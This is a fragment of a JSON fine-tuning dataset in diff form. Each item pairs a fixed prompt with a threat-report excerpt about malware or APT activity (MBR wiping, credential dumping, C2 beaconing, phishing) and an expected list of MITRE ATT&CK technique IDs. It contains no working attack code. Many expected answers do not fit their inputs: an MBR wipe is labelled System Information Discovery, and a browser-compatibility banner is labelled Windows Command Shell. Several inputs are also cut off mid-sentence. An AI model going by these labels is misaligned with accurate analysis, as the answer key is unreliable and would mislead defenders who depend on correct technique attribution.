+ "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"1) It uses the application programming interface (API) CreateFileA to \\\\.\\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with \"\"0x00\"\". The first sector is the disk\u2019s MBR. 3) It will try to perform the routines above (steps 1-2) on \\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, \\\\.\\PHYSICALDRIVE3, and so on, as long as a hard disk is available\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created", + "output": "- T1204.001: User Execution - Malicious Link\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly", + "output": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attempted to blend in with a file name that matched the system name it resided on - Configured for WMI persistence (generally uncommon in 2019) - Used likely compromised infrastructure for C2 - Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we\u2019ve seen before, and we\u2019ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system", + "output": "- T1140: Deobfuscate/Decode Files or Information\n- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi", + "output": "- T1003.002: OS Credential Dumping - Security Account Manager\n- T1003.001: OS Credential Dumping - LSASS Memory\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1003.003: OS Credential Dumping - NTDS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c/bin/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them", + "output": "- T1047: Windows Management Instrumentation\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "sifo \u2013 Collect victim system information - drive \u2013 List drives on victim machine - list \u2013 List file information for provided directory - upload \u2013 Upload a file to the victim machine - open \u2013 Spawn a command shell", + "output": "- T1082: System Information Discovery\n- T1105: Ingress Tool Transfer\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We\u2019ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins", + "output": "- T1087.001: Account Discovery - Local Account\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The initial routine decrypts selected parts of the code section using XOR with a hardcoded value", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of \u2018Office of National Security at the Blue House\u2019 to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3", + "output": "- T1586.002: Compromise Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u201cscheduler\u201d plugin uses it to decompress executable payloads from the C&C", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"X-Session: 0\"\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords\"", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals\u2019 server and isolated the infected systems in the company\u2019s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\"\" (Racicot\"", + "output": "- T1112: Modify Registry\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains", + "output": "- T1090.002: Proxy - External Proxy\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We named Lazarus the most active group of 2020. We\u2019ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group\u2019s other campaigns", + "output": "- T1204.002: User Execution - Malicious File\n- T1005: Data from Local System\n- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the initial computer on the targeted organization\u2019s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials", + "output": "- T1588.002: Obtain Capabilities - Tool\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "id \u2014 the generated unique identifier of the infected host - message \u2014 the Base64-encoded output from the newly created cmd.exe console process", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https://www.baomoivietnam[.]com/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname\u00a0cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (\u0110ang t\u1ea3i) as shown in Figure 1 below", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1082: System Information Discovery\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1083: File and Directory Discovery\n- T1057: Process Discovery\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from 